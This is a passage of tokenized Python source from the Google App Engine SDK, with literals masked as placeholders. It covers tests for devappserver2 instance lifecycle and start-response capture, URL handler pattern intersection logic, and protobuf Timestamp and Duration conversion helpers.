_condition , '<STR_LIT>' ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertTrue ( inst . wait ( <NUM_LIT:0> ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_wait_without_capacity ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:0> ) <EOL> inst . _started = True <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . time = <NUM_LIT:0> <EOL> self . mox . 
stubs . Set ( time , '<STR_LIT:time>' , lambda : self . time ) <EOL> def advance_time ( * unused_args ) : <EOL> self . time += <NUM_LIT:10> <EOL> inst . _condition . wait ( <NUM_LIT:1> ) . WithSideEffects ( advance_time ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertFalse ( inst . wait ( <NUM_LIT:1> ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_wait_timed_out_without_capacity ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:0> ) <EOL> inst . _started = True <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertFalse ( inst . wait ( <NUM_LIT:0> ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_wait_quit_while_starting ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . proxy . start ( ) . WithSideEffects ( inst . quit ) <EOL> self . proxy . quit ( ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertFalse ( inst . can_accept_requests ) <EOL> def test_wait_quit_while_waiting ( self ) : <EOL> self . mox . stubs . Set ( time , '<STR_LIT:time>' , lambda : <NUM_LIT:0> ) <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:0> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> inst . _condition . wait ( <NUM_LIT:1> ) . WithSideEffects ( lambda * unused_args : inst . quit ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertFalse ( inst . wait ( <NUM_LIT:1> ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_health ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . 
proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . proxy . start ( ) <EOL> self . proxy . quit ( ) <EOL> inst . _condition . notify_all ( ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> self . assertTrue ( inst . can_accept_requests ) <EOL> inst . set_health ( False ) <EOL> self . assertFalse ( inst . can_accept_requests ) <EOL> inst . set_health ( True ) <EOL> self . assertTrue ( inst . can_accept_requests ) <EOL> def test_quit ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . proxy . start ( ) <EOL> self . proxy . quit ( ) <EOL> inst . _condition . notify_all ( ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> self . assertTrue ( inst . can_accept_requests ) <EOL> inst . quit ( ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertFalse ( inst . can_accept_requests ) <EOL> def test_quit_with_request ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . proxy . start ( ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> self . mox . VerifyAll ( ) <EOL> inst . _num_outstanding_requests = <NUM_LIT:1> <EOL> self . assertRaises ( instance . CannotQuitServingInstance , <EOL> inst . quit ) <EOL> def test_quit_with_request_force ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> inst . _num_outstanding_requests = <NUM_LIT:1> <EOL> self . proxy . start ( ) <EOL> self . proxy . quit ( ) <EOL> inst . _condition . 
notify_all ( ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> inst . quit ( force = True ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_quit_with_request_force_and_allow_async ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> inst . _num_outstanding_requests = <NUM_LIT:1> <EOL> self . proxy . start ( ) <EOL> self . proxy . quit ( ) <EOL> inst . _condition . notify_all ( ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> inst . quit ( force = True , allow_async = True ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_quit_with_request_allow_async ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> inst . _num_outstanding_requests = <NUM_LIT:1> <EOL> self . proxy . start ( ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> inst . quit ( allow_async = True ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertTrue ( inst . _quitting ) <EOL> def test_quit_shutdown ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> inst . _num_outstanding_requests = <NUM_LIT:1> <EOL> self . proxy . start ( ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> inst . quit ( expect_shutdown = True ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertTrue ( inst . _expecting_shutdown_request ) <EOL> self . assertFalse ( inst . _quitting ) <EOL> def test_get_latency_60s ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . 
proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> now = time . time ( ) <EOL> inst . _request_history = [ ( now , now + <NUM_LIT:1> ) , ( now + <NUM_LIT:2> , now + <NUM_LIT:4> ) ] <EOL> self . assertEqual ( <NUM_LIT> , inst . get_latency_60s ( ) ) <EOL> def test_get_qps_60s ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> now = time . time ( ) <EOL> inst . _request_history = [ ( now , now + <NUM_LIT:1> ) ] * <NUM_LIT> <EOL> self . assertEqual ( <NUM_LIT> , inst . get_qps_60s ( ) ) <EOL> def test__trim_request_history_to_60s ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> inst . _request_history . append ( ( <NUM_LIT:0> , <NUM_LIT:100> ) ) <EOL> inst . _request_history . append ( ( <NUM_LIT:1.0> , <NUM_LIT> ) ) <EOL> inst . _request_history . append ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> inst . _request_history . append ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> now = time . time ( ) <EOL> inst . _request_history . append ( ( now , <NUM_LIT> ) ) <EOL> inst . _request_history . append ( ( now + <NUM_LIT:1> , <NUM_LIT> ) ) <EOL> inst . _request_history . append ( ( now + <NUM_LIT:3> , <NUM_LIT> ) ) <EOL> inst . _request_history . append ( ( now + <NUM_LIT:4> , <NUM_LIT> ) ) <EOL> inst . _trim_request_history_to_60s ( ) <EOL> self . assertEqual ( [ ( now , <NUM_LIT> ) , ( now + <NUM_LIT:1> , <NUM_LIT> ) , ( now + <NUM_LIT:3> , <NUM_LIT> ) , ( now + <NUM_LIT:4> , <NUM_LIT> ) ] , <EOL> list ( inst . _request_history ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> from google . appengine . tools . devappserver2 import start_response_utils <EOL> class TestCapturingStartResponse ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_success ( self ) : <EOL> start_response = start_response_utils . CapturingStartResponse ( ) <EOL> stream = start_response ( '<STR_LIT>' , [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> stream . write ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , start_response . status ) <EOL> self . assertEqual ( None , start_response . exc_info ) <EOL> self . assertEqual ( [ ( '<STR_LIT>' , '<STR_LIT>' ) ] , start_response . response_headers ) <EOL> self . assertEqual ( '<STR_LIT>' , start_response . response_stream . getvalue ( ) ) <EOL> def test_exception ( self ) : <EOL> exc_info = ( object ( ) , object ( ) , object ( ) ) <EOL> start_response = start_response_utils . CapturingStartResponse ( ) <EOL> start_response ( '<STR_LIT>' , [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> start_response ( '<STR_LIT>' , [ ] , exc_info ) <EOL> self . assertEqual ( '<STR_LIT>' , start_response . status ) <EOL> self . assertEqual ( exc_info , start_response . exc_info ) <EOL> self . assertEqual ( [ ] , start_response . response_headers ) <EOL> def test_merged_response ( self ) : <EOL> start_response = start_response_utils . CapturingStartResponse ( ) <EOL> stream = start_response ( '<STR_LIT>' , [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> stream . write ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> start_response . merged_response ( [ '<STR_LIT>' , '<STR_LIT>' ] ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import fnmatch <EOL> import itertools <EOL> import re <EOL> class Handler ( object ) : <EOL> """<STR_LIT>""" <EOL> ALL_PROPERTIES = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:type>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> def __init__ ( self , pattern ) : <EOL> self . pattern = pattern <EOL> def _GetPattern ( self ) : <EOL> return self . _pattern <EOL> def _SetPattern ( self , the_pattern ) : <EOL> self . _pattern = the_pattern <EOL> self . _regex = re . compile ( re . escape ( the_pattern ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) + '<STR_LIT:$>' ) <EOL> self . is_literal = '<STR_LIT:*>' not in the_pattern <EOL> pattern = property ( _GetPattern , _SetPattern ) <EOL> @ property <EOL> def regex ( self ) : <EOL> return self . _regex <EOL> def Regexify ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . pattern . replace ( '<STR_LIT:.>' , '<STR_LIT>' ) . replace ( '<STR_LIT:*>' , '<STR_LIT>' ) <EOL> def MatchesString ( self , pattern_str ) : <EOL> """<STR_LIT>""" <EOL> return self . _regex . match ( pattern_str ) is not None <EOL> def MatchesAll ( self , other_glob ) : <EOL> """<STR_LIT>""" <EOL> return self . MatchesString ( other_glob . pattern ) <EOL> def HasMoreSpecificPatternThan ( self , other_handler ) : <EOL> """<STR_LIT>""" <EOL> if self . is_literal != other_handler . is_literal : <EOL> return self . is_literal <EOL> return len ( self . pattern ) > len ( other_handler . pattern ) <EOL> def __eq__ ( self , other_handler ) : <EOL> return ( isinstance ( other_handler , Handler ) and <EOL> self . __dict__ == other_handler . __dict__ ) <EOL> def IsFullyHandledBy ( self , other_handler ) : <EOL> """<STR_LIT>""" <EOL> return ( other_handler . MatchesAll ( self ) and <EOL> self . _PropertiesMatch ( other_handler ) ) <EOL> def _PropertiesMatch ( self , other ) : <EOL> """<STR_LIT>""" <EOL> for prop in Handler . ALL_PROPERTIES : <EOL> if self . GetProperty ( prop ) not in ( None , other . 
GetProperty ( prop ) ) : <EOL> return False <EOL> return True <EOL> def _MakeHandlerList ( * pattern_strings ) : <EOL> return [ SimpleHandler ( a ) for a in pattern_strings ] <EOL> class SimpleHandler ( Handler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , pattern , properties = None ) : <EOL> super ( SimpleHandler , self ) . __init__ ( pattern ) <EOL> if properties : <EOL> self . properties = properties <EOL> else : <EOL> self . properties = { } <EOL> def __hash__ ( self ) : <EOL> return hash ( ( self . pattern , tuple ( sorted ( self . properties . items ( ) ) ) ) ) <EOL> def GetProperty ( self , prop , default = None ) : <EOL> return self . properties . get ( prop , default ) <EOL> def CreateOverlappedHandler ( self ) : <EOL> """<STR_LIT>""" <EOL> return OverlappedHandler ( self . pattern , matchers = [ self ] ) <EOL> class OverlappedHandler ( Handler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , pattern , matchers = ( ) ) : <EOL> super ( OverlappedHandler , self ) . __init__ ( pattern ) <EOL> self . matchers = [ ] <EOL> for sub_handler in matchers : <EOL> self . AddMatchingHandler ( sub_handler ) <EOL> def GetProperty ( self , prop , default = None ) : <EOL> """<STR_LIT>""" <EOL> largest_handler = None <EOL> prop_value = default <EOL> for sub_handler in self . matchers : <EOL> if sub_handler . GetProperty ( prop ) is not None : <EOL> if ( not largest_handler or <EOL> sub_handler . HasMoreSpecificPatternThan ( largest_handler ) ) : <EOL> largest_handler = sub_handler <EOL> prop_value = sub_handler . GetProperty ( prop ) <EOL> return prop_value <EOL> def __eq__ ( self , other_handler ) : <EOL> return ( isinstance ( other_handler , OverlappedHandler ) and <EOL> self . pattern == other_handler . pattern and <EOL> set ( self . matchers ) == set ( other_handler . matchers ) ) <EOL> def AddMatchingHandler ( self , matcher ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( matcher , SimpleHandler ) : <EOL> self . matchers . 
append ( matcher ) <EOL> else : <EOL> self . matchers . extend ( matcher . matchers ) <EOL> def GetOrderedIntersection ( handler_list ) : <EOL> """<STR_LIT>""" <EOL> results = _Intersect ( handler_list ) <EOL> results = sorted ( results , key = lambda h : h . pattern ) <EOL> _ReorderHandlers ( results ) <EOL> _GivePropertiesFromGeneralToSpecific ( results ) <EOL> return _RemoveRedundantHandlers ( results ) <EOL> def _RemoveRedundantHandlers ( handler_list ) : <EOL> """<STR_LIT>""" <EOL> no_duplicates = [ ] <EOL> patterns_found_so_far = set ( ) <EOL> for i in xrange ( len ( handler_list ) ) : <EOL> current_handler = handler_list [ i ] <EOL> matched_by_later = False <EOL> for j in xrange ( i + <NUM_LIT:1> , len ( handler_list ) ) : <EOL> if current_handler . IsFullyHandledBy ( handler_list [ j ] ) : <EOL> matched_by_later = True <EOL> break <EOL> if ( not matched_by_later and <EOL> current_handler . pattern not in patterns_found_so_far ) : <EOL> no_duplicates . append ( current_handler ) <EOL> patterns_found_so_far . add ( current_handler . pattern ) <EOL> return no_duplicates <EOL> def _ReorderHandlers ( handler_list ) : <EOL> """<STR_LIT>""" <EOL> for i , j in itertools . combinations ( xrange ( len ( handler_list ) ) , <NUM_LIT:2> ) : <EOL> if handler_list [ i ] . MatchesAll ( handler_list [ j ] ) : <EOL> handler_list [ i ] , handler_list [ j ] = handler_list [ j ] , handler_list [ i ] <EOL> def _GivePropertiesFromGeneralToSpecific ( handler_list ) : <EOL> """<STR_LIT>""" <EOL> for i , j in itertools . combinations ( xrange ( len ( handler_list ) ) , <NUM_LIT:2> ) : <EOL> if handler_list [ j ] . MatchesAll ( handler_list [ i ] ) : <EOL> if isinstance ( handler_list [ i ] , SimpleHandler ) : <EOL> handler_list [ i ] = handler_list [ i ] . CreateOverlappedHandler ( ) <EOL> handler_list [ i ] . 
AddMatchingHandler ( handler_list [ j ] ) <EOL> def _Intersect ( handler_list ) : <EOL> """<STR_LIT>""" <EOL> if not handler_list : <EOL> return set ( ) <EOL> handlers = set ( [ handler_list [ <NUM_LIT:0> ] ] ) <EOL> for input_handler in handler_list [ <NUM_LIT:1> : ] : <EOL> new_handlers = set ( ) <EOL> for g in handlers : <EOL> new_handlers |= _IntersectTwoHandlers ( input_handler , g ) <EOL> handlers = new_handlers <EOL> return list ( handlers ) <EOL> def _IntersectTwoHandlers ( first_handler , second_handler ) : <EOL> """<STR_LIT>""" <EOL> shared_prefix = _SharedPrefix ( first_handler . pattern , second_handler . pattern ) <EOL> if shared_prefix : <EOL> return _HandleCommonPrefix ( first_handler , second_handler , shared_prefix ) <EOL> shared_suffix = _SharedSuffix ( first_handler . pattern , second_handler . pattern ) <EOL> if shared_suffix : <EOL> return _HandleCommonSuffix ( first_handler , second_handler , shared_suffix ) <EOL> handler_set = set ( ) <EOL> handler_set |= _HandleWildcardCases ( first_handler , second_handler ) <EOL> handler_set |= _HandleWildcardCases ( second_handler , first_handler ) <EOL> handler_set |= set ( [ first_handler , second_handler ] ) <EOL> return handler_set <EOL> def _HandleWildcardCases ( first_handler , second_handler ) : <EOL> """<STR_LIT>""" <EOL> merged_handlers = set ( ) <EOL> if len ( first_handler . pattern ) <= <NUM_LIT:1> or len ( second_handler . pattern ) <= <NUM_LIT:1> : <EOL> return merged_handlers <EOL> if ( first_handler . pattern [ - <NUM_LIT:1> ] , second_handler . pattern [ <NUM_LIT:0> ] ) != ( '<STR_LIT:*>' , '<STR_LIT:*>' ) : <EOL> return merged_handlers <EOL> first_no_star = first_handler . pattern [ : - <NUM_LIT:1> ] <EOL> merged_handlers . add ( SimpleHandler ( first_no_star + second_handler . pattern ) ) <EOL> if second_handler . MatchesString ( first_no_star ) : <EOL> merged_handlers . 
add ( SimpleHandler ( first_no_star ) ) <EOL> return merged_handlers <EOL> def _HandleCommonPrefix ( first_handler , second_handler , common_prefix ) : <EOL> """<STR_LIT>""" <EOL> stripped_first_handler = SimpleHandler ( <EOL> first_handler . pattern [ len ( common_prefix ) : ] , first_handler . properties ) <EOL> stripped_second_handler = SimpleHandler ( <EOL> second_handler . pattern [ len ( common_prefix ) : ] , second_handler . properties ) <EOL> stripped_handlers = _IntersectTwoHandlers ( stripped_first_handler , <EOL> stripped_second_handler ) <EOL> handlers = set ( ) <EOL> for stripped_handler in stripped_handlers : <EOL> handlers . add ( SimpleHandler ( common_prefix + stripped_handler . pattern , <EOL> stripped_handler . properties ) ) <EOL> return handlers <EOL> def _HandleCommonSuffix ( first_handler , second_handler , common_suffix ) : <EOL> """<STR_LIT>""" <EOL> stripped_first_handler = SimpleHandler ( <EOL> first_handler . pattern [ : - len ( common_suffix ) ] , first_handler . properties ) <EOL> stripped_second_handler = SimpleHandler ( <EOL> second_handler . pattern [ : - len ( common_suffix ) ] , second_handler . properties ) <EOL> stripped_handlers = _IntersectTwoHandlers ( <EOL> stripped_first_handler , stripped_second_handler ) <EOL> handlers = set ( ) <EOL> for stripped_handler in stripped_handlers : <EOL> handlers . add ( SimpleHandler ( stripped_handler . pattern + common_suffix , <EOL> stripped_handler . properties ) ) <EOL> return handlers <EOL> def _SharedPrefix ( pattern1 , pattern2 ) : <EOL> """<STR_LIT>""" <EOL> first_star1 = ( pattern1 + '<STR_LIT:*>' ) . find ( '<STR_LIT:*>' ) <EOL> first_star2 = ( pattern2 + '<STR_LIT:*>' ) . 
find ( '<STR_LIT:*>' ) <EOL> if ( first_star1 , first_star2 ) != ( len ( pattern1 ) , len ( pattern2 ) ) : <EOL> min_star = min ( first_star1 , first_star2 ) <EOL> if min_star and pattern1 [ : min_star ] == pattern2 [ : min_star ] : <EOL> return pattern1 [ : min_star ] <EOL> return '<STR_LIT>' <EOL> def _SharedSuffix ( pattern1 , pattern2 ) : <EOL> """<STR_LIT>""" <EOL> return _SharedPrefix ( pattern1 [ : : - <NUM_LIT:1> ] , pattern2 [ : : - <NUM_LIT:1> ] ) [ : : - <NUM_LIT:1> ] </s>
<s> """<STR_LIT>""" <EOL> from datetime import datetime <EOL> from datetime import timedelta <EOL> from google . appengine . _internal import six <EOL> from google . net . proto2 . python . public . descriptor import FieldDescriptor <EOL> _TIMESTAMPFOMAT = '<STR_LIT>' <EOL> _NANOS_PER_SECOND = <NUM_LIT> <EOL> _NANOS_PER_MILLISECOND = <NUM_LIT> <EOL> _NANOS_PER_MICROSECOND = <NUM_LIT:1000> <EOL> _MILLIS_PER_SECOND = <NUM_LIT:1000> <EOL> _MICROS_PER_SECOND = <NUM_LIT> <EOL> _SECONDS_PER_DAY = <NUM_LIT> * <NUM_LIT> <EOL> class Error ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class ParseError ( Error ) : <EOL> """<STR_LIT>""" <EOL> class Any ( object ) : <EOL> """<STR_LIT>""" <EOL> def Pack ( self , msg , type_url_prefix = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if len ( type_url_prefix ) < <NUM_LIT:1> or type_url_prefix [ - <NUM_LIT:1> ] != '<STR_LIT:/>' : <EOL> self . type_url = '<STR_LIT>' % ( type_url_prefix , msg . DESCRIPTOR . full_name ) <EOL> else : <EOL> self . type_url = '<STR_LIT>' % ( type_url_prefix , msg . DESCRIPTOR . full_name ) <EOL> self . value = msg . SerializeToString ( ) <EOL> def Unpack ( self , msg ) : <EOL> """<STR_LIT>""" <EOL> descriptor = msg . DESCRIPTOR <EOL> if not self . Is ( descriptor ) : <EOL> return False <EOL> msg . ParseFromString ( self . value ) <EOL> return True <EOL> def TypeName ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . type_url . split ( '<STR_LIT:/>' ) [ - <NUM_LIT:1> ] <EOL> def Is ( self , descriptor ) : <EOL> """<STR_LIT>""" <EOL> return self . TypeName ( ) == descriptor . full_name <EOL> class Timestamp ( object ) : <EOL> """<STR_LIT>""" <EOL> def ToJsonString ( self ) : <EOL> """<STR_LIT>""" <EOL> nanos = self . nanos % _NANOS_PER_SECOND <EOL> total_sec = self . seconds + ( self . 
nanos - nanos ) // _NANOS_PER_SECOND <EOL> seconds = total_sec % _SECONDS_PER_DAY <EOL> days = ( total_sec - seconds ) // _SECONDS_PER_DAY <EOL> dt = datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) + timedelta ( days , seconds ) <EOL> result = dt . isoformat ( ) <EOL> if ( nanos % <NUM_LIT> ) == <NUM_LIT:0> : <EOL> return result + '<STR_LIT>' <EOL> if ( nanos % <NUM_LIT> ) == <NUM_LIT:0> : <EOL> return result + '<STR_LIT>' % ( nanos / <NUM_LIT> ) <EOL> if ( nanos % <NUM_LIT> ) == <NUM_LIT:0> : <EOL> return result + '<STR_LIT>' % ( nanos / <NUM_LIT> ) <EOL> return result + '<STR_LIT>' % nanos <EOL> def FromJsonString ( self , value ) : <EOL> """<STR_LIT>""" <EOL> timezone_offset = value . find ( '<STR_LIT>' ) <EOL> if timezone_offset == - <NUM_LIT:1> : <EOL> timezone_offset = value . find ( '<STR_LIT:+>' ) <EOL> if timezone_offset == - <NUM_LIT:1> : <EOL> timezone_offset = value . rfind ( '<STR_LIT:->' ) <EOL> if timezone_offset == - <NUM_LIT:1> : <EOL> raise ParseError ( <EOL> '<STR_LIT>' ) <EOL> time_value = value [ <NUM_LIT:0> : timezone_offset ] <EOL> point_position = time_value . find ( '<STR_LIT:.>' ) <EOL> if point_position == - <NUM_LIT:1> : <EOL> second_value = time_value <EOL> nano_value = '<STR_LIT>' <EOL> else : <EOL> second_value = time_value [ : point_position ] <EOL> nano_value = time_value [ point_position + <NUM_LIT:1> : ] <EOL> date_object = datetime . strptime ( second_value , _TIMESTAMPFOMAT ) <EOL> td = date_object - datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> seconds = td . seconds + td . days * _SECONDS_PER_DAY <EOL> if len ( nano_value ) > <NUM_LIT:9> : <EOL> raise ParseError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . 
format ( nano_value ) ) <EOL> if nano_value : <EOL> nanos = round ( float ( '<STR_LIT>' + nano_value ) * <NUM_LIT> ) <EOL> else : <EOL> nanos = <NUM_LIT:0> <EOL> if value [ timezone_offset ] == '<STR_LIT>' : <EOL> if len ( value ) != timezone_offset + <NUM_LIT:1> : <EOL> raise ParseError ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( value ) ) <EOL> else : <EOL> timezone = value [ timezone_offset : ] <EOL> pos = timezone . find ( '<STR_LIT::>' ) <EOL> if pos == - <NUM_LIT:1> : <EOL> raise ParseError ( <EOL> '<STR_LIT>' . format ( timezone ) ) <EOL> if timezone [ <NUM_LIT:0> ] == '<STR_LIT:+>' : <EOL> seconds -= ( int ( timezone [ <NUM_LIT:1> : pos ] ) * <NUM_LIT> + int ( timezone [ pos + <NUM_LIT:1> : ] ) ) * <NUM_LIT> <EOL> else : <EOL> seconds += ( int ( timezone [ <NUM_LIT:1> : pos ] ) * <NUM_LIT> + int ( timezone [ pos + <NUM_LIT:1> : ] ) ) * <NUM_LIT> <EOL> self . seconds = int ( seconds ) <EOL> self . nanos = int ( nanos ) <EOL> def GetCurrentTime ( self ) : <EOL> """<STR_LIT>""" <EOL> self . FromDatetime ( datetime . utcnow ( ) ) <EOL> def ToNanoseconds ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . seconds * _NANOS_PER_SECOND + self . nanos <EOL> def ToMicroseconds ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( self . seconds * _MICROS_PER_SECOND + <EOL> self . nanos // _NANOS_PER_MICROSECOND ) <EOL> def ToMilliseconds ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( self . seconds * _MILLIS_PER_SECOND + <EOL> self . nanos // _NANOS_PER_MILLISECOND ) <EOL> def ToSeconds ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . seconds <EOL> def FromNanoseconds ( self , nanos ) : <EOL> """<STR_LIT>""" <EOL> self . seconds = nanos // _NANOS_PER_SECOND <EOL> self . nanos = nanos % _NANOS_PER_SECOND <EOL> def FromMicroseconds ( self , micros ) : <EOL> """<STR_LIT>""" <EOL> self . seconds = micros // _MICROS_PER_SECOND <EOL> self . 
nanos = ( micros % _MICROS_PER_SECOND ) * _NANOS_PER_MICROSECOND <EOL> def FromMilliseconds ( self , millis ) : <EOL> """<STR_LIT>""" <EOL> self . seconds = millis // _MILLIS_PER_SECOND <EOL> self . nanos = ( millis % _MILLIS_PER_SECOND ) * _NANOS_PER_MILLISECOND <EOL> def FromSeconds ( self , seconds ) : <EOL> """<STR_LIT>""" <EOL> self . seconds = seconds <EOL> self . nanos = <NUM_LIT:0> <EOL> def ToDatetime ( self ) : <EOL> """<STR_LIT>""" <EOL> return datetime . utcfromtimestamp ( <EOL> self . seconds + self . nanos / float ( _NANOS_PER_SECOND ) ) <EOL> def FromDatetime ( self , dt ) : <EOL> """<STR_LIT>""" <EOL> td = dt - datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> self . seconds = td . seconds + td . days * _SECONDS_PER_DAY <EOL> self . nanos = td . microseconds * _NANOS_PER_MICROSECOND <EOL> class Duration ( object ) : <EOL> """<STR_LIT>""" <EOL> def ToJsonString ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . seconds < <NUM_LIT:0> or self . nanos < <NUM_LIT:0> : <EOL> result = '<STR_LIT:->' <EOL> seconds = - self . seconds + int ( ( <NUM_LIT:0> - self . nanos ) // <NUM_LIT> ) <EOL> nanos = ( <NUM_LIT:0> - self . nanos ) % <NUM_LIT> <EOL> else : <EOL> result = '<STR_LIT>' <EOL> seconds = self . seconds + int ( self . nanos // <NUM_LIT> ) <EOL> nanos = self . nanos % <NUM_LIT> <EOL> result += '<STR_LIT>' % seconds <EOL> if ( nanos % <NUM_LIT> ) == <NUM_LIT:0> : <EOL> return result + '<STR_LIT:s>' <EOL> if ( nanos % <NUM_LIT> ) == <NUM_LIT:0> : <EOL> return result + '<STR_LIT>' % ( nanos / <NUM_LIT> ) <EOL> if ( nanos % <NUM_LIT> ) == <NUM_LIT:0> : <EOL> return result + '<STR_LIT>' % ( nanos / <NUM_LIT> ) <EOL> return result + '<STR_LIT>' % nanos <EOL> def FromJsonString ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if len ( value ) < <NUM_LIT:1> or value [ - <NUM_LIT:1> ] != '<STR_LIT:s>' : <EOL> raise ParseError ( <EOL> '<STR_LIT>' . format ( value ) ) <EOL> try : <EOL> pos = value . 
